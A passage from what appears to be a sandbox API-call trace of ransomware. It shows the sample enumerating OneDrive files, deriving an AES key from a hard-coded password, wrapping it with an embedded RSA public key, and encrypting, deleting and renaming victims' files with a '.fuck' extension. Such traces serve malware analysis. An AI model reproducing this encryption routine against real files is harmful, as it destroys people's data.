lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0282.506] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0282.528] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0282.528] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0282.857] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0282.857] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0282.857] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0282.857] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0282.857] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0282.857] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0282.857] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0282.857] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0282.857] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0282.857] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0282.857] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0282.857] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0282.857] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9d204*=0xbc, lpOverlapped=0x0) returned 1 [0282.857] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0xbc, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9d204*=0xc0) returned 1 [0282.857] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9d204*=0xc0, lpOverlapped=0x0) returned 1 [0282.858] CloseHandle (hObject=0x5d3c) returned 1 [0282.858] CloseHandle (hObject=0x5d80) returned 1 [0282.858] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\OneDriveLogo.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\onedrivelogo.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\OneDriveLogo.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\onedrivelogo.png"), bFailIfExists=0) returned 1 [0282.860] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\OneDriveLogo.png", dwFileAttributes=0x0) returned 1 [0282.861] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\OneDriveLogo.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\onedrivelogo.png.gsg")) returned 1 [0282.862] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\OneDriveLogo.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\onedrivelogo.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\OneDriveLogo.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\onedrivelogo.png.fuck")) returned 1 [0282.863] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0282.863] CryptDestroyKey (hKey=0x2fa748) returned 1 [0282.863] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0282.863] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0282.863] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0282.863] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0282.863] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0282.863] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0282.863] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0282.863] GetLastError () returned 0x0 [0282.863] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\or-in\\filesync.localizedresources.dll.mui")) returned 0x20 [0282.863] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0282.864] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\or-in\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0282.864] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\or-in\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0282.865] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0282.865] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1f768) returned 1 [0282.867] CryptCreateHash (in: hProv=0x2f1f768, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0282.867] lstrlenA (lpString="DbEzeqAXcZyIDeePOCTADQaQzMlQm") returned 29 [0282.867] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb5f8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0282.867] CryptDeriveKey (in: hProv=0x2f1f768, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc808) returned 1 [0282.867] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0282.867] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0282.867] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1f438) returned 1 [0282.868] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1f438, dwCertEncodingType=0x1, pInfo=0x2f38000*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f38030*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f38038*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc188) returned 1 [0282.868] CryptEncrypt (in: hKey=0x2fc188, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0282.868] CryptEncrypt (in: hKey=0x2fc188, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1f900*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1f900*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0282.868] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f1f900*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1f900*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0282.869] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.065] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.065] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.066] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.067] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.067] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.067] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.067] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.067] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.067] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.067] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.067] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.067] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.067] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.067] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.068] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.068] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.068] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.068] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.068] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.068] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.068] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.068] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.068] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.068] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.068] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.068] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.068] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.069] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.069] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.069] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.069] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.069] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.069] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.069] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.069] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.069] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.069] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.069] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.069] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.070] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.070] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.070] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.070] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.070] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.070] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.070] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.070] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.070] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.070] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.070] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.071] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 